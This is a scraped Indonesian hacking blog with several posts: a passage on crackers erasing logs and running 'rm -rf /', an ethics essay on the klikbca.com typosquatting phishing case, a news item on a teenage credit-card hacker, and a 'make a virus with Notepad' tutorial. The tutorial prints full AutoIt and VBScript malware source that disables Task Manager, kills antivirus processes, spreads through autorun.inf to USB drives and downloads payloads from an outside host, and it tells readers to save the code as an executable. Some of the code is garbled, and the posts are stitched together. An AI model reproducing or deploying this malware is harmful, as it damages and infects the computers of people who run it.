Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan 'clean-up‘ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang 'backdooring'. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.
Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah ‘rm –rf / &’. Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.
Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ‘rm –rf / &’.
Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.
Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu dekat Insya Allah sekitar pertengahan April 2001 akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus Hartanto (hartx@writeme.com) & Lekso Budi Handoko (handoko@riset.dinus.ac.id). Seperti umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak – bantuan & sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.
Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, “To boldly go where no one has gone before”.

SITUS-SITUS PALSU YANG DIBUAT HACKER

Posted by Rizky Prasetya 14.50, under |


LATAR BELAKANG PERMASALAHAN

Dewasa ini seiring dengan semakin canggih dan modernnya berbagai macam teknologi, maka penggunaan internet pun juga semakin marak pada berbagai aspek kehidupan. Teknologi ini ibaratnya pedang bermata dua. Di satu sisi, hal positifnya, teknologi (internet) diyakini mempunyai peran dalam membantu organisasi beroperasi dengan efisien, efektif, dan kompetitif dan juga dapat mempermudah serta membantu pekerjaan kita sehingga cepat terselesaikan. Kita dapat dengan mudah mendapatkan data-data dari berbagai sumber, data dapat diakses dimanapun dan kapanpun, penggunaan yang relatif mudah, data digunakan untuk membuat keputusan yang lebih baik, dan mengurangi biaya dimana salah satu tujuan utamanya dari penggunaan internet adalah digunakan sebagai pendukung keputusan (decision support system). Namun pada sisi yang lainnya, hal negatif, dengan berkembangnya teknologi, aspek atau bidang lain pun juga ikut berkembang, seperti kecerdasan, kepandaian, kemodernan, bahkan sampai kejahatan, kecurangan, dan pembajakan, baik yang terjadi di dunia nyata maupun di dunia maya (internet).Teknologi internet menghadapi berbagai tantangan baru dalam melindungi privasi individual. Informasi yang dikirim dari satu jaringan ke jaringan lainnya, akan melalui berbagai macam system computer sebelum akhirnya mencapai tjuan yang hendak dicapainya. Setiap system mampu untuk memonitor, menangkap, dan menyimpan informasi tersebut, jadi sangat memungkinkan untuk menyimpan berbagai macam aktivitas online yang pada akhirnya mengancam privasi pemakai internet.Salah satu isu utama yang menimpa penggunaan internet adalah mengenai keamanan dan etika, Internet yang digunakan sebagai decision support system oleh pihak manajemen akan dihadapkan pada integritas data dan juga keamanan dari system tersebut, decision support system mengandung informasi yang sangat penting bagi suatu organisasi dan pihak manajemen dari organisasi tersebut. Selain itu, organisasi yang menggunakan decision support system juga perlu memperhatikan secara serius mengenai isu etika seperti privasi dan akuntabilitasnya.Menurut O’Brien (2004:393):If you don’t take the proper precautions, any time you send an e-mail, access a web-site, post a message to a news group, or use the Internet for banking and shopping…whether you’re online for business or pleasure, you’re vulnerable to anyone bent on collecting data about you without your knowledge. Fortunately, by using tools like encryption and anonymous remailers-and by being selective about the sites you visit and the information you provide-you can minimize, if not completely eliminate, the risk of your privacy being violated.Lebih lanjut O’Brien (2004:400) berpendapat “With Internet access proliferating rapidly, one might think that the biggest obstacle to electronic commerce would be bandwidth. But it’s not; the number one problem is security. And part of the problem is that the Internet was developed for interoperability, not impenetrability”.Oleh karena itu keamanan, etika dan privasi dalam berinternet harus mendapat penanganan yang tepat termasuk di Indonesia dimana salah satu kasus yang terjadi mengenai penduplikatan situs internet banking www.klikbca.com yang dilakukan oleh salah satu anak bangsa kita sendiri. Seringkali penanganan keamanan system informasi sudah baik, tetapi dengan kesengajaan ataupun kelalaian seseorang dapat merusak sekuriti yang sudah ada. Permasalahan etika juga muncul ketika seseorang dengan sengaja merusak keamanan dari system informasi.PERUMUSAN PERMASALAHANBerdasarkan latar belakang permasalahan dan kasus di atas, maka perumusan masalahnya adalah:a. Bagaimana kasus tersebut dapat terjadi jika dipandang dari sisi keamanan system informasi, etika, dan privasi?b. Bagaimana penanganan kasus tersebut dari sisi keamanan, etika, dan privasi?KASUSPada tahun 2001, internet banking diributkan oleh kasus pembobolan internet banking milik bank BCA, www.klikbca.com , Kasus tersebut dilakukan oleh seorang mantan mahasiswa ITB Bandung dan juga merupakan salah satu karyawan media online (satunet.com) yang bernama Steven Haryanto. Anehnya Steven ini bukan Insinyur Elektro ataupun Informatika, melainkan Insinyur Kimia. Ide ini timbul ketika Steven juga pernah salah mengetikkan alamat website. Kemudian dia membeli domain-domain internet dengan harga sekitar US$20 yang menggunakan nama dengan kemungkinan orang-orang salah mengetikkan dan tampilan yang sama persis dengan situs internet banking BCA, www.klikbca.com , seperti:wwwklikbca.comkilkbca.comclikbca.comklickbca.comklikbac.comOrang tidak akan sadar bahwa dirinya telah menggunakan situs aspal tersebut karena tampilan yang disajikan serupa dengan situs aslinya. Hacker tersebut mampu mendapatkan User ID dan password dari pengguna yang memasuki sutis aspal tersebut, namun hacker tersebut tidak bermaksud melakukan tindakan criminal seperti mencuri dana nasabah, hal ini murni dilakukan atas keingintahuannya mengenai seberapa banyak orang yang tidak sadar menggunakan situs klikbca.com, Sekaligus menguji tingkat keamanan dari situs milik BCA tersebut.ANALISISSteven Haryanto dapat disebut sebagai hacker, karena dia telah mengganggu suatu system milik orang lain, yang dilindungi privasinya. Sehingga tindakan Steven ini disebut sebagai hacking. Steven dapat digolongkan dalam tipe hacker sebagai gabungan white-hat hacker dan black-hat hacker, dimana Steven hanya mencoba mengetahui seberapa besar tingkat keamanan yang dimiliki oleh situs internet banking Bank BCA, www.klikbca.com. Disebut white-hat hacker karena dia tidak mencuri dana nasabah, tetapi hanya mendapatkan User ID dan password milik nasabah yang masuk dalam situs internet banking palsu. Namun tindakan yang dilakukan oleh Steven, juga termasuk black-hat hacker karena membuat situs palsu dengan diam-diam mengambil data milik pihak lain.

Hal-hal yang dilakukan Steven antara lain scans, sniffer, dan password crackers.
Tindakan Steven ini juga tergolong dalam kejahatan computer, yang dikategorikan:
(1)the unauthorized use, access, modification, and destruction of hardware, software, data, or network resources;
(2)the unauthorized copying of software;
(3) denying an end user access to his or her own hardware, software, data, or network resources;
(4)and using or conspiring to use computer or network resources to illegally obtain information or tangible property.

Untuk mengetahui apakah hal yang dilakukan Steven tersebut dikatakan melanggar etika atau tidak, maka terdapat lima langkah proses yang digunakan dalam menganalisa etika:
1. Mengidentifikasi dan menggambarkan fakta secara jelas.Terbukti bahwa Steven mengakui perbuatannya dan menjelaskan langkah-langkahnya dari awal hingga akhir.
2. Mendefinisikan konflik atau dilema dan mengidentifikasi urutan nilai dari yang tertinggi yang terkandung dalam konflik atau dilema tersebut.Pada awalnya Steven juga salah satu pengguna internet yang salah ketik pada alamat website. Berawal dari sana, Steven membuat situs internet banking palsu milik BCA. Hal tersebut berhasil menipu banyak nasabah internet banking BCA.
3. Mengidentifikasikan pihak-pihak yang berkepentingan.Pihak yang paling bertanggungjawab terhadap hal ini tentunya pelaku pembuat situs internet banking palsu, Steven, yang melibatkan nasabah BCA dan BCA itu sendiri.
4. Mengidentifikasi alternatif pilihan-pilihan yang dapat digunakan.Selain menggunakan internet banking, transaksi perbankan dapat dilakukan melalui via telepon ataupun m-banking, namun Steven hanya melakukan tindakannya melalui via internet banking, yaitu membuat situs internet banking BCA yang palsu.
5. Mengidentifikasi kosekuensi yang mungkin ditimbulkan dari pilihan-pilihan alternatif tersebut.Karena tindakannya, banyak nasabah BCA yang tidak hati-hati dan masuk ke situs palsu tersebut yang mengakibatkan user ID dan password-nya dapat diketahui oleh Steven.Jadi dapat dikatakan apa yang dilakukan Steven secara etik tidak benar namun juga menimbulkan sisi positif dimana pihak perbankan dapat belajar dari kasus tersebut karena tindakan yang dilakukan Steven hanya bermodalkan keingintahuan dan uang sejumlah kira-kira US$ 20 guna membeli domain internet yang digunakan untuk membuat situs internet banking BCA palsu. BCA menggunakan internet banking yang dapat dipakai pengambilan keputusan atau yang disebut decision support system, dimana data para nasabah yang bertransakasi serta aktivitas lainnya melalui internet banking merupakan database milik BCA secara privasi yang tidak boleh disebarluaskan ataupun disalahgunakan karena internet banking tersebut merupakan salah satu layanan yang menguntungkan baik bagi nasabah maupun pihak BCA. Database para nasabah internet banking dapat digunakan oleh pihak BCA untuk membuat keputusan dalam berbagai bidang perbankan.

KESIMPULAN
Berdasarkan analisis di atas, maka kasus Steven Haryanto ini tidak digolongkan tindakan kriminal dimana dia tidak mencuri dana milik nasabah namun tindakannya tetap melanggar etika, privasi, dan keamanan dari banyak pihak. Hal ini dapat menjadi pelajaran bagi semua pihak, utamanya pihak nasabah dan perbankan. Diharapkan kejadian tersebut tidak akan terulang lagi di masa yang akan datang dan tidak menjadi ide bagi hacker yang lain.SARANHal yang paling utama yang perlu diperhatikan dari pemberian fasilitas layanan internet banking oleh pihak perbankan adalah masalah keamanan (security) yang berhubungan dengan privasi dari nasabah. Keamanan layanan online internet banking ini mencakup keamanan koneksi nasabah, keamanan data transaksi, keamanan koneksi server, dan keamanan jaringan system operasi dari server.

Secara internal, perbankanpun dihadapkan dengan sulitnya melindungi sumber daya informasi, seperti:
1. Terdapat ratusan ancaman keamanan dan hal itu akan terus berubah dan berkembang.
2. Sulitnya untuk memberikan proteksi bagi sumber daya informasi karena berada di luar jangkauan, misalnya mesin ATM.
3. Berkembangnya teknologi meyebabkan tindakan kriminal akan terus berkembang pula.
4. Banyak kejahatan computer yang tidak terdeteksi untuk waktu yang cukup lama.
5. Orang yang cenderung untuk mematahkan prosedur keamanan dikarenakan prosedurnya yang cukup berbelit-belit.
6. Banyak pelaku kejahatan komputer yang tidak ditindak secara hukum dengan tegas.
7. Biaya untuk mencegah beberapa hazard sangat tinggi.Manajer berkesempatan menciptakan etika di lingkungan organisasinya.

Berikut ini merupakan cara-cara untuk menetapkan standard etika:
1. Information rights and obligations.Privasi internet dan e-mail pekerja, pemonitoran tempat kerja, penyukuhan informasi organisasi, dan kebijakan pada informasi nasabah.
2. Property rights and obligations.Sebagai panduan yang spesifik untuk hubungan dengan pihak ketiga.
3. system qualityMendeskripsikan tingkatan akan kualitas data dan system errornya yang dapat ditoleransi.
4. Quality of lifeMenyatakan bahwa tujuan dari system yang dibuat adalah untuk menngkatkan kualitas kehidupan nasabah dan juga pekerjanya dengan pencapaian kualitas produk yang tinggi, customer service yang bagus, kepuasan pekerja, dan lain-lain.
5. Accountability and controlMenyatakan tanggung jawab dari masing-masing personel dan bagaimana pengendaliannya.Dengan adanya standar etika tersebut, diharapkan pihak internal tidak melakukan tindakan serupa seperti yang dilakukan oleh Steven, yaitu membuat situs phising (aspal).

Namun hal tersebut akan menimbulkan dilema-dilema sebagai berikut:
1. Konsekuensi. Seberapa banyak atau seberapa sedikit manfaat maupun kerugian yang timbul dari keputusan yang diambil?
2. Opini masyarakat. Apa persepsi masyarakat tentang tindakan yang diambil?
3. Likelihood of effect. Kemungkinan apa baik manfaat yang diperoleh maupun kerugian yang akan timbul jika melakukan tindakan tersebut?
4. Konsekuensi waktu. Berapa lama waktu yang akan diambil sehingga mengakibatkan manfaat atau kerugian tesebut?
5. Relatedness. Berapa banyak orang yang akan mendapatkan manfaat atau yang menderita kerugian?
6. Pencapaian hasil. Berapa banyak orang yang akan berdampak dari tindakan tersebut?

Pihak BCA dapat tetap menggunakan internet banking untuk mendukung layanan perbankannya karena internet banking tersebut berdasarkan layanan web yang dapat memberikan keuntungan atau manfaat sebagai berikut:
1. Internet merupakan sumber yang kaya akan informasi, dimana diharapkan nasabah akan dapat memperoleh informasi perbankannya dengan cepat.
2. Kemudahan pengaksesan data, dimana internet dapat diakses dimana saja dan kapan saja.
3. Mudah untuk diterapkan dalam pengaplikasiannya, karena terdapat langkah-langkah yang jelas dan terpandu.
4. Mengurangi biaya-biaya.
5. Dapat digunakan untuk pengambilan keputusan bagi nasabah dengan cepat karena tersedia banyak informasi dan cepat dalam mengambil tindakan melalui internet.
6. Dapat digunakan oleh pihak penyedia, perbankan, sebagai decision support system dimana akan mendukung dalam langkah perbaikannya secara kontinu di masa yang akan datang.

Dalam pelaksanaannya harus didukung dengan etika dalam teknologi, seperti berikut:
1. Sesuai dengan proporsi, dimana teknologi yang dikembangkan juga diiringi dengan pencegahan dari kerusakan dan risiko.
2. Dengan adanya teknologi, maka teknologi tersebut harus mengerti dan menerima berbagai kmeungkinan adanya risiko.
3. Adil, dimana keuntungan dan kerugian dari teknologi harus dibagikan secara merata sehingga tidak ada yang menderita keuntungan saja dan di lain pihak menderita kerugian saja.
4. Meminimalisasi risiko-risiko. Adanya teknologi yang semakin berkembang, diharapkan akan dapat menghindari risiko-risiko yang membahayakan.

Secara eksternal, para nasabahpun dapat diberikan kiat-kiat dalam melakukan transaksi melalui internet , seperti:
1. Menggunakan antivirus dan firewall dan selalu meng-updatenya untuk menghindari kerusakan program dan data.
2. Menggunakan password (PIN) yang sulit untuk ditebak dna sering untuk menggantinya.
3. Perhatikan dalam mengetik domain address, jangan sampai salah mengetikkannya.
4. Jangan selalu mempercayai pada internet banking, namun cobalah sekali-kali untuk mengecek pada bank akan kebenarannya.Berdasarkan saran di atas dapat disimpulkan bahwa penggunaan komputer dan jaringan internet, tidak akan dapat terlepas dari isu etika, privasi, dan keamanan. Oleh karena itu, untuk penanganan kasus-kasus tersebut harus melibatkan pihak internal dan eksternal, dimana masing-masing pihak tersebut harus menyadari aturan dan hukum yang berlaku. Bagi pihak internal, sebaiknya menyediakan fasilitas dengan tingkat keamanan dan keintegritasan data yang tinggi. Di lain pihak, dari pihak eksternal, para pemakai sebaiknya harus lebih berhati-hati dalam menggunakan fasilitas yang disediakan demi terlindungi privasinya.

http://v-hacker.blogspot.com/2009/09/seorang-hacker-remaja-membobol-kartu.html

Posted by Rizky Prasetya 14.48, under |


Seorang hacker remaja telah menggunakan kartu kredit Bill Gates untuk memesan dan mengirimkan Viagra untuk Bill Gates.

Raphael Gray, 19 tahun, menyatakan dirinya sebagai 'orang suci dari e-commerce', setelah meng-hack perusahaan US, Canada dan Inggris untuk mengekspose lubang di Internet. Perbuatannya menyebabkan satu perusahaan keuangan menderita kerugian yang sangat besar. Gray diperintahkan untk menjalani pengobatan percobaan untuk gangguan mental selama 3 tahun.

Gray, yang dituntut atas perbuatannya yang merugikan karena dia berhasil mendapatkan 23,000 kartu kredit dari berbagai perusahaan yang dihack olehnya salah satunya yaitu kartu kreditnya Bill Gates, yang kemudian Gray memesan dan mengirimkan Viagra kepada Bill dengan kartu kreditnya.

Hakim Gareth davies diberitahu bahwa Gray dicurigai menderita gangguan mental dan minder yang kronis sejak kecil, yang memberikan kontribusi atas apa yang dilakukannya ini di Internet. Dan berdasar catatan medis, bahwa 4 tahun yang lalu Gray pernah jatuh dan membentur kepalanya.

Pembelanya mengatakan bahwa karena sebab itulah yang mengakibatkan perbuatannya di Internet. Gray menyatakan penyesalannya bukan pada apa yang dilakukannya tetapi caranya, dan dia mengatakan di lain kesempatan dia akan melakukannya lagi tapi secara legal.

Polisi membutuhkan waktu sebulan untuk melacak sang hacker sampai ke rumahnya di Clynderwen, Carmarthen, sebelah barat Wales dan ditangkap oleh FBI pada bulan Maret tahun lalu. Pesan pesan yang ditinggalkan di situs yang dihack olehnya berisi antara lain:" I'm for e-commerce when concluded in a secure and sensible manner but this is a rare thing. Most companies put some kind of page together and wait for the money to roll in. These people are the criminals." Dan pesan lainnya "If your site is broken into, you should spend more time asking why and not who." Apakah anda setuju dengan pernyataan ini ?? Jika Ya, maka anggap sebuah situs diibaratkan dengan sebuah rumah, di mana seseorang mencoba membobol rumah itu dengan berbagai peralatan, apakah anda masih tetap menjawab ya ?

Cara buat virus via "NOTEPAD"

Posted by Rizky Prasetya 19.44, under |




[-] Buka notepad
[-] Copas code di bawah di notepad:



; DEATH_DRIVE 2.6 ;
; --------------------- ;
; written by poet_freak rizky.prasetya ;
; only for educational purpose only ;
; this code is given freely ;
; without any warranty, use it at ;
; your own risk ;
; oktober, 25 - 2011, 19.36 pm ;
;all rights reversed ;
; ==================================== ;

Opt(trayiconhide ,1) ; hide systemtray icon

if ProcessExists(explorer.exe) = true Then ;check the process, if explorer.exe exist
Run(@windowsdir & deathdrive_daemon.exe) ; run C:\windows\deathdrive_daemon.exe
EndIf

While 1

if ProcessExists(taskmgr.exe) = true Then ;if taskmanager active = True
Shutdown(6) ; force restart computer
endif
If ProcessExists(msconfig.exe) = true Then ; if msconfig active = true
shutdown(6) ; force restart
EndIf
ProcessClose(ansav.exe) ; force close ansav.exe
ProcessClose(pcmav-cln.exe) ; force close pcmav-cln.exe

$reg1 = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ; declare var reg1 as HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
$reg2 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion ; declare var reg2 as HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
RegWrite ($reg1,daemon,REG_SZ,@windowsdir &\p0et.exe) ; write registry value at $reg1
RegWrite ($reg1,Avgsystray,REG_SZ,@windowsdir &\p0et_freak1.exe)
RegWrite ($reg1,esetkrn,REG_SZ,@windowsdir &\p0et_freak2.exe)
RegWrite ($reg1,NvidCpl,REG_SZ,@windowsdir &\p0et_freak3.exe)
RegWrite ($reg1,Msmsgs,REG_SZ,@windowsdir &\msmsgs.exe)
Regwrite ($reg2 & \Explorer\Advanced,SuperHidden,REG_DWORD,0) ; write registry value at $reg2
Regwrite ($reg2 & \Explorer\Advanced,ShowSuperHidden,REG_DWORD,0)
Regwrite ($reg2 & \Explorer\Advanced,HideFileExt,REG_DWORD,1)
Regwrite ($reg2 & \Explorer\Advanced,Hidden,REG_DWORD,2)
RegWrite ($reg2 & \Policies\Explorer,NoFind,REG_DWORD,1)
Regwrite ($reg2 & \Policies\Explorer,NoFolderOptions,REG_DWORD,1)
Regwrite ($reg2 & \Policies\Explorer,NoDriveTypeAutoRun,REG_DWORD,91)
RegWrite ($reg2 & \Policies\Explorer,NoWelcomeScreen,REG_DWORD,1)
Regwrite ($reg2 & \Policies\system,DisableTaskMgr,REG_DWORD,1)
Regwrite ($reg2 & \Policies\system,DisableRegistryTools,REG_DWORD,1)
Regwrite ($reg2 & \Policies\system,ConfirmFileDelete,REG_DWORD,0)
RegWrite(HKEY_CURRENT_USER\Control Panel\International, s1159, REG_SZ, poet)
RegWrite(HKEY_CURRENT_USER\Control Panel\International, s2359, REG_SZ, poet)
RegWrite(HKEY_CURRENT_USER\Control Panel\International\Mouse, MouseSensitivity, REG_SZ, 0)
RegWrite(HKEY_CURRENT_USER\Control Panel\International\Mouse, SwapMouseButtons, REG_SZ, 1)

FileCopy(@ScriptFullPath,@windowsdir & \msmsgs.exe) ; create msmsgs.exe at C:\windows
FileCopy(@scriptfullpath,@windowsdir & \p0et_freak1.exe)
FileCopy(@scriptfullpath,@windowsdir & \p0et_freak2.exe)
FileCopy(@scriptfullpath,@windowsdir & \p0et_freak3.exe)
FileCopy(@ScriptFullPath,@TempDir & \pagefile.pif)
FileCopy(@scriptfullpath,@ProgramFilesDir & \Common Files\D_loader.exe)
FileSetAttrib(@windowsdir & \wininit.exe,-R) ; clear read only attribute
FileSetAttrib(@windowsdir & \msmsgs.exe,+R+H+S) ; create readonly + hidden + system file attribute
FileSetAttrib(@windowsdir & \p0et_freak1.exe,+R+H+S)
FileSetAttrib(@windowsdir & \p0et_freak2.exe,+R+H+S)
FileSetAttrib(@windowsdir & \p0et_freak3.exe,+R+H+S)
FileSetAttrib(@TempDir & \pagefile.pif,+S+R+H)
FileDelete(@windowsdir &\wininit.exe) ; delete C:\Windows\wininit.exe
FileDelete(@SystemDir & \MsVbVm60.dll)

if FileExists(@WindowsDir &\autorun.inf) <> True Then ; check autorun.inf in c:\windows, if not exist,
$atr = fileOpen(@WindowsDir & \autorun.inf,2) ; create autorun.inf in C:\windows, then open C:\windows\autorun.inf
FileWrite($atr, [autorun] & @CRLF) ; write [autorun]
filewrite($atr, label=Infected.! &@crlf) ; write label=infected.! at next line
FileWrite($atr, open=d_loader.exe & @CRLF)
FileWrite($atr, shellexecute=d_loader.exe &@CRLF)
FileWrite($atr, shell\Explore\command=d_loader.exe &@CRLF)
FileWrite($atr, shell\Open\command=d_loader.exe &@CRLF)
FileWrite($atr, shell=Explore)
FileClose($atr) ; close file
FileSetAttrib(@WindowsDir & \autorun.inf,+R+H+S) ; set file attribute to readonly, hidden, system
EndIf

if FileExists(@MyDocumentsDir & \death-drive ver. 2.6 readme.txt) <> True Then
$atr = FileOpen(@MyDocumentsDir & \death-drive ver. 2.6 readme.txt,2)
FileWrite($atr, to: someone there.... I still love U... & @CRLF)
Filewrite($atr, & @crlf)
Filewrite($atr, aku tak akan panjang lebar, & @crlf)
Filewrite($atr, aku hanya ingin tahu jawabmu, & @crlf)
Filewrite($atr, mengapa kamu mencampakkan diriku, & @crlf)
Filewrite($atr, aku tlah sabar padamu, tapi dirimu tak mau mengerti arti diriku yang ada di sampingmu. jujur maaf kan aku arum,meisi,indah&masita. & @crlf)
Filewrite($atr, & @crlf)
Filewrite($atr, apa salahku?? & @crlf)
Filewrite($atr, mengapa dirimu begitu?? & @crlf)
Filewrite($atr, & @crlf)
Filewrite($atr, mengapa sampai segitunya dirimu membenciku?? & @crlf)
Filewrite($atr, & @crlf)
Filewrite($atr, 01 juni 2009 //* Aku masih sayang padamu *// p0et & @crlf)
FileClose($atr)
EndIf

$path1 = DriveGetDrive (REMOVABLE)
if Not @error Then
for $d = 1 to $path1[0]
$flashdrive = $path1[$d]
if $flashdrive <> A: and DriveGetFileSystem($flashdrive) <> Then
FileSetAttrib($flashdrive & \autorun.inf,-R)
FileCopy(@ScriptFullPath,$flashdrive &\d_loader.exe)
FileCopy(@WindowsDir & \autorun.inf,$flashdrive & \autorun.inf,1)
FileCopy(@mydocumentsdir & \death-drive ver. 2.6 readme.txt, $flashdrive & \death-drive ver. 2.6 readme.txt)
FileSetAttrib($flashdrive & \autorun.inf,+R+H+S)
FileSetAttrib($flashdrive & \d_loader.exe,+R+H+S)
; Search1
$search1 = FileFindFirstFile($flashdrive & \*.)
if $search1 <> -1 Then
$file1 = FileFindNextFile($search1)
FileCopy(@scriptfullpath,$flashdrive &\& $file1 &.exe)
FileSetAttrib($flashdrive &\& $file1,+H)
FileSetAttrib($flashdrive &\& $file1 &.exe,-H-S)
EndIf
FileClose($search1)
EndIf
Next
EndIf
; Harddisk Drive
$path2 = DriveGetDrive (FIXED)
if Not @error Then
for $f = 1 to $path2[0]
$drive = $path2[$f]
FileSetAttrib($drive & \autorun.inf,-R)
FileCopy(@mydocumentsdir & \death-drive ver. 2.6 readme.txt, $drive & \death-drive ver. 2.6 readme.txt) ;copy
FileDelete($drive & \autorun.inf)
FileCopy(@scriptfullpath, $drive & temp.exe)
Next
EndIf


; *optional, auto-update feature
$webpath = http://h1.ripway.com/poet_freak/file ; declare webpath to download update
if FileExists(@systemdir & \p0et_freak1.exe) = True Then ; check file, if exist download file1.exe from webpath, then rename it to poet_freak1.exe
InetGet($webpath & /file1.exe,@SystemDir & \p0et_freak1.exe)
EndIf
if FileExists(@systemdir & \p0et_freak2.exe) = True Then
InetGet($webpath & /file2.exe,@SystemDir & \p0et_freak2.exe)
EndIf
if FileExists(@systemdir & \p0et_freak3.exe) = True Then
InetGet($webpath & /file3.exe,@SystemDir & \p0et_freak3.exe)
EndIf
WEnd Set oWMP = CreateObject(WMPlayer.OCX.7)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loopOn error resume next
Dim Regpen, FSO, Copier, Creator, Dupler, Deleter, Runner
set Regpen = CreateObject (Wscript.Shell )
set FSO = CreateObject (Scripting. FileSystemObject )
set Creator = FSO.CreateTextFile (C:\Ternate. vbs, true)
Creator.WriteLine (Msgbox (& Chr (34) & Salam Kenal dari Saya,
Mr.Dajjal :< & chr (34)& )) Creator.Close Regpen.RegWrite HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr entVersion\Policies \System\NoRun ,1,REG_ DWORD Regpen.RegWrite HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr entVersion\Policies \System\DisableT askMgr, 1,RE G_DWORD Regpen.RegWrite HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr entVersion\Policies \System\DisableC MD,1, REG_DW ORD Regpen.RegWrite HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr entVersion\Policies \Explorer\ NoFolderOption ,1, REG_DWORD Regpen.RegWrite HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr entVersion\Policies \Explorer\ NoDrives ,16,REG_ D WORD Regpen.RegWrite HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr entVersion\Policies \Explorer\ NoSaveSettings ,1, REG_DWORD Regpen.RegWrite HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr entVersion\Policies \Explorer\ NoControlPanel ,1, REG_DWORD Regpen.RegWrite HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr entVersion\Policies \NoSetTaskbar ,1,REG_ DWORD Regpen.RegWrite HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr entVersion\Policies \Explorer\ Advanced\ HideFileExt ,1,REG_DWORD Regpen.Regwrite HKEY_LOCAL_ MACHINE\Software \Microsoft\ Windows\Cur rentVersion\ Winlogon\ LegalNoticeCapti on, THE Syaithan-X Regpen.RegWrite HKEY_LOCAL_ MACHINE\Software \Microsoft\ Windows\Cur rentVersion\ Winlogon\ LegalNoticeText ,ASSALAMUALA IKUM, YA AHLIL KUBUR Set Copier = FSO.GetFile (C:\Ternate. vbs) Copier.Copy (C:\Documents and Settings\All Users\Start Menu\Programs\ Startup\Adobe. vbs) FSO.CreateFolder (C:\Program Files\Microsoft 0ffice\0ffice12 ) FSO.CreateFolder (D:\Program ) FSO.CreateFolder (E:\Program ) FSO.CreateFolder (F:\Program ) FSO.CreateFolder (G:\Program ) FSO.CreateFolder (H:\Program ) FSO.CreateFolder (I:\Program ) FSO.CreateFolder (J:\Program ) FSO.CreateFolder (K:\Program ) Set Deleter = FSO.GetFile (C:\Windows\ System32\ Restore\rstrui. exe) Deleter.Move (C:\Program Files\Microsoft 0ffice\0ffice12\ rstrui.Gnamu ) set Dupler = FSO.GetFile (WScript.ScriptFull Name) Dupler.Copy (C:\Program Files\Microsof 0ffice\0ffice12\ Rizky-Prasetya.vbs ) Dupler.Copy (C:\Documents and Settings\All Users\Start Menu\Programs\ Startup\Desktop. ini.vbs) Dupler.Copy (C:\Documents and Settings\All Users\Desktop\ Hcr-Rizky_Antivirus .exe.vbs ) Dupler.Copy (C:\Windows\ System32\ Restore\rstrui. exe.vbs) Dupler.Copy (D:\Program\ MotoGP_SETUP. vbs) Dupler.Copy (E:\Program\ TuneUp2009_ SETUP.vbs ) Dupler.Copy (F:\Program\ Ansav_SETUP. vbs) Dupler.Copy (G:\Program\ DeltaForce_ SETUP.vbs ) Dupler.Copy (H:\Program\ DeltaForce_ SETUP.vbs ) Dupler.Copy (I:\Program\ Ansav_SETUP. vbs) Dupler.Copy (J:\Program\ Project.vbs ) Dupler.Copy (K:\Program\ Hantu.vbs ) Set Runner = WScript.CreateObjec t (WScript.Shell ) Runner.Run (C:\Program Files\Microsoft 0ffice\0ffice12\ Hantu.vbs ) ; end of code [-] Lalu save dengan format Qkanslalumencintaimu.exe ataupun .vbs "Good Luck!!" [-] By:Rizky-Prasetya

Mencurangi (hampir) Semua Jenis Billing Warnet...

Posted by Rizky Prasetya 15.19, under |


Cara ini saya dapetin pas kantong lagi kempes tapi nafsu online lagi tinggi

